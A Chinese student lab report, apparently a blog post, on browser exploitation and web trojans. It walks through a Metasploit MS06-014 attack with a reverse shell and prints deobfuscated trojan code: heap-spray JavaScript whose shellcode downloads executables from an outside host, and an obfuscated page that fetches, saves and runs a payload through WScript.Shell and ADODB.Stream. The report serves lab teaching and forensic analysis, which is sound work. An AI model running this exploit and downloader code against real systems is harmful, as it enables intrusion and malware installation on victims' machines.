1 实践内容
1.1 Web浏览器的安全威胁
1.1.1 现代Web浏览器的基本结构与机理
现代Web浏览器指的是符合"现代标准",并被互联网用户所接受使用的Web浏览器软件,目前的现代Web浏览器要求能够理解并支持HTML和XHTML、CSS、ECMAScript及W3C DOM等一系列标准,其基本结构与各种功能特性的复杂性也已经大大增加。需要支持各种应用层协议的Stream流接收与解析,并维护DOM对象模型结构,通过支持EMCAScript标准构建JavaScript、Flash ActionScript等客户端脚本语言的执行环境,以及支持CSS标准控制页面布局,最终在浏览器终端中将服务器端的各种流媒体对象、应用程序、客户端脚本执行效果进行渲染,展现给终端用户。
现代Web浏览器软件除了在内核引擎中实现符合各种标准的基本功能和特性之外,普遍地采用各种扩展机制允许第三方开发一些插件,以提升浏览器软件功能的丰富性。下表显示了目前全球五个最主要的现代Web浏览器软件所采用的内核引繁与可扩展性机制情况,微软IE浏览器基于 Trident内核引擎(也被称为 MSHTML),在第一次浏览器战争过程中的1996年即采用了 Activex技术来支持第三方开发扩展插件,并沿用至今。Mozilla Firefox的内核引繁为 Gecko,通过XUL平台支持扩展插件开发。 Google Chrome和苹果的Safari都基于开源的 Webkit内核引擎, Opera基于的内核引擎为 Presto,这三款浏览器软件均于2010年才开始支持第三方扩展插件,Google Chrome可通过Xmlhttprequest和JSON机制来实现第三方扩展,而 Safari与 Opera则采用了标准化的 HTML5、CSS3与 Javascript支持第三方实现扩展插件。
除了扩展插件机制之外,现代Web浏览器还通过各种客户端脚本执行环境、独立沙箱运行环境和虚拟机,来支持构造具有桌面应用程序特性的富 Internet应用(RIA: Rich Internet Application),目前Adobe Flash/Flex、Java和微软Sliverlight是三种最普遍的RIA平台环境技术,帮助Web应用程序提供更友好的用户交互、客户端执行与展现效果。
1.1.2 Web浏览的安全问题与威胁
Web浏览器软件的安全困境三要素:复杂性、可扩展性、连通性。
Web浏览安全威胁位置:
-
针对传输网络的网络协议安全威胁:网络是连接Web应用服务端与客户端浏览环境的媒介,因此对于Web浏览端而言,与Web服务器端同样面临着网络传输协议安全攻击与威胁。
-
针对Web浏览端系统平台的安全威胁:互联网用户在浏览网页过程中所使用的浏览器软件、插件及相关应用程序都运行在桌面操作系统之上,桌面操作系统所存在的安全漏洞使得Web浏览环境存在着被攻击的风险。
-
针对Web浏览器软件及插件程序的滲透攻击威胁:随着防火墙、网络入侵防御系统等安全设备在网络边界上的部署,传统的针对服务器端的渗透攻击变得愈加困难,在这背景下,针对Web浏览器软件及插件程序的客户端渗透攻击在近几年来逐渐变得流行。
-
针对互联网用户的社会工程学攻击威胁:恶意攻击会利用进行Web浏览的互联网用户本身所存在的人性、心理等方面的弱点,实施社会工程学攻击。
1.2 Web浏览端的渗透攻击威胁---网页木马
网页木马是从恶意网页脚本所孕育和发展出来的。网页木马发展与流行的驱动力是黑客地下经济链。网页木马存在的技术基础是Web浏览端安全漏洞。
网页木马的定义特性:通过对网页木马起源背景和存在技术基础的分析,我们可以认知到网页木马从本质特性上是利用了现代Web浏览器软件中所支持的客户端脚本执行能力,针对Web浏览端软件安全漏洞实施客户端渗透攻击,从而取得在客户端主机的远程代码执行权限来植入恶意程序。因此从根本上分析,网页木马是针对Web浏览端软件实施的客户端滲透攻击代码,是对在针对服务器端软件的传统滲透攻击代码基础上的一种演进,针对服务器端软件的滲透攻击形式从网络攻击出现以来一直是主流。
基于上述分析,我们定义网页木马是对Web浏览端软件进行客户端渗透攻击的一类恶意移动代码,通常以网页脚本如JavaScript、VBScript实现,或以Flash、PDF等恶意构造的Web文件形式存在,通过利用Web浏览端软件中存在的安全漏洞,获得客户端计算机的控制权限以植入恶意程序。
对网页木马机理的全方位分析与理解:由于网页木马采用的是客户端渗透攻击的形式,就不可避免地需要Web浏览端软某访问构造的恶意Web页面内容,才可能触发滲透攻击过程。因此,与传统服务器端滲透攻击可以主动地进行网络扫描与攻击不同,网页木马的攻击是被动式的,需要通过一些技术方法来诱使互联网用户来访问网页木马页面此外在网页木马通过渗透攻击获得客户端计算机的远程代码执行权限之后,为了进行进一步的主机控制和敏感信息窃取,一般需要植入一些盗号木马等类型的恶意程序。因此实施网页木马攻击不像传统服务器端滲透攻击那么简单,往往涉及较为复杂的多步骤攻击场景,并需要多种类型的恶意代码及网络资源。
网页木马的特点:
-
多样化的客户端渗透攻击位置和技术类型
-
分布式、复杂的微观链接结构
-
灵活多变的混淆与对抗分析能力
网页木马的检测与分析技术:
-
基于特征码匹配的传统检测方法
-
基于统计与机器学习的静态分析方法
-
基于动态行为结果判定的检测分析方法
-
基于模拟浏览器环境的动态分析检测方法
-
网页木马检测分析技术综合对比
网页木马防范措施:应对网页木马最根本的防范措施与应对传统渗透攻击一样,就是提升操作系统与浏览端平台软件的安全性,可以采用操作系统本身提供的在线更新以及第三方软件所提供的常用应用软件更新机制,来确保所使用的计算机始终处于一种相对安全的状态:另外安装与实时更新一款优秀的反病毒软件也是应对网页木马威胁必不可少的环节,同时养成安全上网浏览的良好习惯,并借助于 Google安全浏览、 Site Advisor等站点安全评估工具的帮助避免访问那些可能遭遇挂马或者安全性不高的网站,可以有效地降低被网页木马滲透攻击的概率:最后,在目前网页木马威胁主要危害 Windows平台和IE浏览器用户的情况下,或许安装 Mac OS/ Linux操作系统,并使用 Chrome、 Safari、 Opera等冷门浏览器进行上网,做互联网网民中特立独行的少数派,可以有效地避免网页木马的侵扰。
2 实践过程
2.1 web浏览器渗透攻击
任务:使用攻击机和Windows靶机进行浏览器渗透攻击实验,体验网页木马构造及实施浏览器攻击的实际过程。
实验步骤:
1)选择使用Metasploit中的MS06-014渗透攻击模块
2)选择PAYLOAD为任意远程Shell连接
3)设置服务器地址和URL参数,运行exploit,构造出恶意网页木马脚本
4)在靶机环境中启动浏览器,验证与服务器的连通性,并访问而已网页木马脚本URL
5)攻击机的Metasploit软件中查看渗透攻击状态,并通过成功渗透攻击后建立起的远程控制会话SESSION,在靶机上远程执行命令
启动攻击机kali,输入指令"msfconsole",打开Metasploit工具。输入指令"search MS06-014",搜索MS06-014渗透攻击模块。
可以发现只有一个可用的攻击模块。输入指令"use exploit/windows/browser/ie_createobject"使用该模块。
依次输入以下指令进行设置:
-
show payloads -
set payload generic/shell_reverse_tcp -
set lhost 192.168.11.208 -
run
攻击机中会显示建立会话成功。
输入指令"sessions -i 1"打开会话1。
然后执行命令ipconfig,发现执行成功,因此sessions成功建立。
2.2 取证分析实践—网页木马攻击场景分析
①首先你应该访问start.html,在这个文件中给出了new09.htm的地址,
②在进入 htm 后,每解密出一个文件地址,请对其作 32 位 MD5 散列,以散列值为文件名到 http://192.168.68.253/scom/hashed/%E5%93%88%E5%B8%8C%E5%80%BC%E4%B8%8B%E5%8E%BB%E4%B8%8B%E8%BD%BD%E5%AF%B9%E5%BA%94%E7%9A%84%E6%96%87%E4%BB%B6(%E6%B3%A8%E6%84%8F:%E6%96%87%E4%BB%B6%E5%90%8D%E4%B8%AD%E7%9A%84%E8%8B%B1%E6%96%87%E5%AD%97%E6%AF%8D%E4%B8%BA%E5%B0%8F%E5%86%99%EF%BC%8C%E4%B8%94%E6%B2%A1%E6%9C%89%E6%89%A9%E5%B1%95%E5%90%8D)%EF%BC%8C%E5%8D%B3%E4%B8%BA%E8%A7%A3%E5%AF%86%E5%87%BA%E7%9A%84%E5%9C%B0%E5%9D%80%E5%AF%B9%E5%BA%94%E7%9A%84%E6%96%87%E4%BB%B6%E3%80%82
③如果解密出的地址给出的是网页或脚本文件,请继续解密。
④如果解密出的地址是二进制程序文件,请进行静态反汇编或动态调试。
⑤重复以上过程直到这些文件被全部分析完成。
首先用MadEdit打开"start.htm"文件。对其中的程序代码进行分析。可以发现,在该网页嵌入了一个内联框架,指向了一个网页new09.htm,且该内联框架高度宽度为0,使其不容易被发现。
可以看到"new09.htm"使用了相对路径。这说明他们在同一路径。
继续用MadEdit打开"new09.htm"文件。可以看到其中有两个指向的路径:"http://aa.18dd.net/aa/kl.htm%22%E5%92%8C%22http://js.users.51.la/1299644.js%22%E3%80%82
找到这两MD5值所对应的文件。分别用文本编辑器打开。其中23180a42a2ff1192150231b44ffdf3d3中没有有效信息。
在文件7f60672dcd6b5e90b6772545ee219bd3中,使用了XXTEA+Base64 加密方法。
该文件中的"xxtea_decrypt 函数"的第二个参数是"\x73\x63\x72\x69\x70\x74",这是密钥。使用了16进制表示,我们将其转化为ASCII码为"script"。
解密后的明文为:
再对其进行hexdecode,得到:
对解密后的代码进行分析:
这些代码涉及到的网页有:http://aa.18dd.net/aa/1.js%E3%80%81http://aa.18dd.net/aa/b.js%E3%80%81http://aa.18dd.net/aa/pps.js%E3%80%81http://down.18dd.net/bb/bd.cab
对上述提到的网页求哈希值:MD5(http://aa.18dd.net/aa/1.js,32) = 5d7e9058a857aa2abee820d5473c5fa4
MD5(http://aa.18dd.net/aa/b.js,32) = 3870c28cc279d457746b3796a262f166
MD5(http://aa.18dd.net/aa/pps.js,32) = 5f0b8bf0385314dbe0e5ec95e6abedc2
MD5(http://down.18dd.net/bb/bd.cab,32) = 1c1d7b3539a617517c49eee4120783b2
然后按照http://192.168.68.253/scom/hashed/MD5%E5%80%BC%E7%9A%84%E6%A0%BC%E5%BC%8F%E4%B8%8B%E8%BD%BD%E6%96%87%E4%BB%B6%EF%BC%8C%E5%BE%97%E5%88%B0%E5%9B%9B%E4%B8%AA%E6%96%87%E4%BB%B6%E3%80%82%E5%88%86%E5%88%AB%E4%BE%9D%E6%AC%A1%E5%AF%B9%E8%BF%99%E4%BA%9B%E6%96%87%E4%BB%B6%E8%BF%9B%E8%A1%8C%E5%88%86%E6%9E%90%EF%BC%9A
其包含十六进制字符串,然后对其进行解码:
发现这个文件会下载一个名为014.exe的可执行文件
利用UnPacker工具第一次解码得到了以下内容
提取其中的字符串:
-
var bigblock=unescape("%u9090%u9090"); -
var headersize=20; -
var shellcode=unescape("%uf3e9%u0000"+"%u9000%u9090%u5a90%ua164%u0030%u0000%u408b%u8b0c"+"%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378"+"%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b"+"%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%ufcef"+"%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1"+"%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103"+"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904"+"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b"+"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e"+"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d"+"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320"+"%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344"+"%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc"+"%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0"+"%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab"+"%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f"+"%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574"+"%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e"+"%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00"+"%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c"+"%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54"+"%u6946%u656c%u0041%u7468%u7074%u2f3a%u642f%u776f%u2e6e%u3831%u6464%u6e2e%u7465%u622f%u2f62%u6662%u652e%u6578%u0000"); -
var slackspace=headersize+shellcode.length; -
while(bigblock.length<slackspace)bigblock+=bigblock; -
fillblock=bigblock.substring(0,slackspace); -
block=bigblock.substring(0,bigblock.length-slackspace); -
while(block.length+slackspace<0x40000)block=block+block+fillblock; -
memory=new Array(); -
for(x=0;x<300;x++) -
memory[x]=block+shellcode; -
var buffer=''; -
while(buffer.length<4068)buffer+="\x0a\x0a\x0a\x0a"; -
storm.rawParse(buffer)
我们可以看到关键字shellcode,根据参考文件,shellcode是一个下载器,因此需要寻找其中的URL,最后找到的结果为http://down.18dd.net/bb/bf.exe%E5%BE%97%E5%88%B0%E4%B8%80%E4%B8%AA%E5%8F%AF%E6%89%A7%E8%A1%8C%E6%96%87%E4%BB%B6%E3%80%82
现在对第三个文件进行分析:
这里采用了八进制加密方式,解密结果为:
-
/*%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" + -
"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" + -
"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" + -
"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" + -
"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" + -
"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" + -
"%u206a%uff53%uec57%u*/ -
pps=(document.createElement("object")); -
pps.setAttribute("classid","clsid:5EC7C511-CD0F-42E6-830C-1BD9882F3458") -
var shellcode = unescape("%uf3e9%u0000"+ -
"%u9000%u9090%u5a90%ua164%u0030%u0000%u408b%u8b0c" + -
"%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378" + -
"%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b" + -
"%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%u04c7" + -
"%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1" + -
"%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" + -
"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" + -
"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" + -
"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" + -
"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" + -
"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" + -
"%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344" + -
"%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc" + -
"%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0" + -
"%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab" + -
"%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f" + -
"%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574" + -
"%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e" + -
"%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00" + -
"%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c" + -
"%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54" + -
"%u6946%u656c%u0041%u7468%u7074%u2f3a%u642f%u776f%u2e6e%u3831%u6464%u6e2e%u7465%u622f%u2f62%u7070%u2e73%u7865%u0065"); -
var bigblock = unescape("%u9090%u9090"); -
var headersize = 20; -
var slackspace = headersize+shellcode.length; -
while (bigblock.length<slackspace) bigblock+=bigblock; -
fillblock = bigblock.substring(0, slackspace); -
block = bigblock.substring(0, bigblock.length-slackspace); -
while(block.length+slackspace<0x40000) block = block+block+fillblock; -
memory = new Array(); -
for (x=0; -
x<400; -
x++) memory[x] = block + shellcode; -
var buffer = ''; -
while (buffer.length < 500) buffer+="\x0a\x0a\x0a\x0a"; -
pps.Logo = buffer
同上一个解密方法一样,可以得到可执行文件http://down.18dd.net/bb/pps.exe
接下来对以上得到的链接计算相应的MD5值:
http://down.18dd.net/bb/014.exe :ca4e4a1730b0f69a9b94393d9443b979
http://down.18dd.net/bb/bf.exe%EF%BC%9A 268cbd59fbed235f6cf6b41b92b03f8e
http://down.18dd.net/bb/pps.exe :ff59b3b8961f502289c1b4df8c37e2a4
在资源中找到对应的文件,可以发现四个文件的大小相同。并且在kali中计算上述文件对应的md5值,发现结果一摸一样,那么可以推测四个文件的内容一摸一样。所以我们只需要看其中一个即可,在IDA反汇编中打开四个文件中的一个
其中包含从各种URL下载各种木马
2.3 攻防对抗实践—web浏览器渗透攻击攻防
任务:攻击方使用 Metasploit 构造出攻击至少两个不同Web浏览端软件安全漏洞的渗透攻击代码,并进行混淆处理后组装成一个URL链接,通过具有欺骗性的电子邮件发送给防守方。防守方对电子邮件中的挂马链接进行提取、解混淆分析,尝试恢复出渗透攻击代码的原始形态,并分析出这些渗透代码都是攻击哪些Web浏览端软件的哪些安全漏洞。撰写详细实验分析报告,对攻防对抗过程进行总结。
本次实践使用实践一进行分析:
使用的得到的url用邮箱发送给防守方。防守方打开该网址:
查看该网页的源代码。
如下所示为代码块:
<html>
<head>
<title></title>
<scriptlanguage="javascript">
Function TNnqPqFwATYGhAFN(o,n)
{
varr=null;
try
{
eval("r=o"+".C"+"re"+"ate"+"Ob"+"je"+"ct(n)")
}catch(e){}
if(!r)
{
try
{
eval("r=o"+".Cr"+"ea"+"teO"+"bj"+"ect(n,'')")
}catch(e){}
}
if(!r)
{
try
{
eval("r=o"+".Cr"+"ea"+"teO"+"bj"+
"ect(n,'','')")
}catch(e){}
}
if(!r)
{
try
{
eval("r=o"+".Ge"+"tOb"+"je"+"ct('',n)")
}catch(e){}
}
if(!r)
{
try
{
eval("r=o"+".Ge"+"tOb"+"ject(n,'')")
}catch(e){}
}
if(!r)
{
try
{
eval("r=o"+".Ge"+"tOb"+"ject(n)")
}catch(e){}
}
return(r);
}
Function MVPXzuoZeLqwiAgmYyyewEJvmOllm(a)
{
var s=TNnqPqFwATYGhAFN(a,"W"+"Sc"+"ri"+"pt"+".S"+"he"+"ll");
var o=TNnqPqFwATYGhAFN(a,"A"+"DO"+"D"+"B.S"+"tr"+"eam");
var e=s.Environment("P"+"ro"+"ce"+"ss");
var url=document.location+'/p'+'ay'+'lo'+'ad';
var xml =null;
var bin=e.Item("T"+"E"+"M"+"P")+"\\rzULNEAMzLdxJYBzMznRxycm"+".e"+"xe";
var dat; try
{
xml=new XMLHttpRequest();
}
catch(e)
{
try
{
xml = new ActiveXObject("Microsoft.XMLHTTP");
}
catch(e)
{
xml= new ActiveXObject("MSXML2.ServerXMLHTTP");
}
}
if(!xml)
{
return(0);
}
xml.open("GET",url,false);
xml.send(null);
dat=xml.responseBody;
o.Type=1;
o.Mode=3;
o.Open();
o.Write(dat);
o.SaveToFile(bin,2);
s.Run(bin,0);
}
function tVvSIcjfVnZffIabEspn()
{
var i=0;
var t=new Array('{'+'B'+'D'+'9'+'6'+'C'+'5'+'5'+'6'+'-'+'6'+'5'+'A'+'3'+'-'+'1'+'1'+'D'+'0'+''+'9'+'8'+'3'+'A'+'-'+'0'+'0'+'C'+'0'+'4'+'F'+'C'+'2'+'9'+'E'+'3'+'6'+'}','{'+
'B'+'D'+'9'+'6'+'C'+'5'+'5'+'6'+'-'+'6'+'5'+'A'+'3'+'-'+'1'+'1'+'D'+'0'+'-'+'9'+'8'+'3'+'A'+'-'+'0'+'0'+'C'+'0'+'4'+'F'+'C'+'2'+'9'+'E'+'3'+'0'+'}','{'+'7'+'F'+'5'+'B'+'7'+'F'+'6'+'3'+'-'+'F'+'0'+'6'+'F'+'-'+'4'+'3'+'3'+'1'+'-'+'8'+'A'+'2'+'6'+'-'+'3'+'3'+'9'+'E'+'0'+'3'+'C'+'0'+'A'+'E'+'3'+'D'+'}','{'+'6'+'e'+'3'+'2'+'0'+'7'+'0'+'a'+'-'+'7'+'6'+'6'+'d'+'-'+'4'+'e'+'e'+'6'+'-'+'8'+'7'+'9'+'c'+''+'d'+'c'+'1'+'f'+'a'+'9'+'1'+'d'+'2'+'f'+'c'+'3'+'}'
,'{'+'6'+'4'+'1'+'4'+'5'+'1'+'2'+'B'+'-'+'B'+'9'+'7'+'8'+'-'+'4'+'5'+'1'+'D'+'-'+'A'+'0'+'D'+'8'+'-'+'F'+'C'+'F'+'D'+
'F'+'3'+'3'+'E'+'8'+'3'+'3'+'C'+'}','{'+'0'+'6'+'7'+'2'+'3'+'E'+'0'+'9'+'-'+'F'+'4'+'C'+'2'+'-'+'4'+'3'+'c'+'8'+'-'+'8'+'3'+'5'+'8'+'-'+'0'+'9'+'F'+'C'+'D'+'1'+'D'+'B'+'0'+'7'+'6'+'6'+'}','{'+'6'+'3'+'9'+'F'+'7'+'2'+'5'+'F'+'-'+'1'+'B'+'2'+'D'+'-'+'4'+'8'+'3'+'1'+'-'+'A'+'9'+'F'+'D'+'-'+'8'+'7'+'4'+'8'+'4'+'7'+'6'+'8'+'2'+'0'+'1'+'0'+'}','{'+'B'+'A'+'0'+'1'+'8'+'5'+'9'+'9'+'-'+'1'+'D'+'B'+'3'+'-'+'4'+'4'+'f'+'9'+'-'+'8'+'3'+'B'+'4'+'-'+'4'+'6'+'1'+'4'+'5'+'4'+'C'+'8'+'4'+'B'+'F'+'8'+'}','{'+'D'+'0'+'C'+'0'+'7'+'D'+'5'+'6'+'-'+'7'+'C'+'6'+'9'+'-'+'4'+'3'+'F'+'1'+'-'+'B'+'4'+'A'+'0'+'-'+'2'+'5'+'F'+'5'+'A'+'1'+'1'+'F'+'A'+'B'+'1'+'9'+'}','{'+'E'+'8'+'C'+'C'+'C'+'D'+'D'+'F'+'-'+'C'+'A'+'2'+'8'+'-'+'4'+'9'+'6'+'b'+'-'+'B'+'0'+'5'+'0'+'-'+'6'+'C'+'0'+'7'+'C'+'9'+'6'+'2'+'4'+'7'+'6'+'B'+'}','{'+'A'+'B'+'9'+'B'+'C'+'E'+'D'+'D'+'-'+'E'+'C'+'7'+'E'+'-'+'4'+'7'+'E'+'1'+'-'+'9'+'3'+'2'+'2'+'-'+'D'+'4'+'A'+'2'+'1'+'0'+'6'+'1'+'7'+'1'+'1'+'6'+'}','{'+'0'+'0'+'0'+'6'+'F'+'0'+'3'+'3'+'-'+'0'+'0'+'0'+'0'+'-'+'0'+'0'+'0'+'0'+'-'+'C'+'0'+'0'+'0'+'-'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'4'+'6'+'}','{'+'0'+'0'+'0'+'6'+'F'+'0'+'3'+'A'+'-'+'0'+'0'+'0'+'0'+'-'+'0'+'0'+'0'+'0'+'-'+'C'+'0'+'0'+'0'+'-'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'4'+'6'+'}',null);
while(t[i])
{
Var a=null;
if(t[i].substring(0,1)=='{')
{
a=document.createElement("object");
a.setAttribute("cl"+"as"+"sid","cl"+"s"+"id"+":"+t[i].substring(1,t[i].length-1));}
else{try{a=newActiveXObject(t[i]);}
catch(e){}}
if(a)
{
try
{
Var b=TNnqPqFwATYGhAFN(a,"W"+"Sc"+"ri"+"pt"+".S"+"he"+"ll");
if(b)
{
MVPXzuoZeLqwiAgmYyyewEJvmOllm(a);
return(0);}
}catch(e){}}i++;}}
</script></head>
<body οnlοad='tVvSIcjfVnZffIabEspn()'>YyswB
</body></html>
对代码分析可以看到:
document.location加载了payload,这个代码是可执行文件wowZAsRCmg.exe,
我们可以得出这个可执行文件应该是通过把攻击机作为服务器,
以网页下载的方式下载到靶机上。
通过观察var t=newArray后面的数据,可以很轻易看出是利用了MS06014的漏洞
3 学习中遇到的问题及解决
Q:攻击机和靶机又ping不通
A:重新调节网络,改变桥接模式
4 实践总结
本周实践主要学习了web浏览器渗透攻击,网页木马攻击场景分析以及攻防对抗实践等,通过以上学习进一步加深了自己对网络安全知识的理解,其中遇到了很多小困难,比如攻击机和靶机之间的ping不通等,但是最后都解决了
164
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
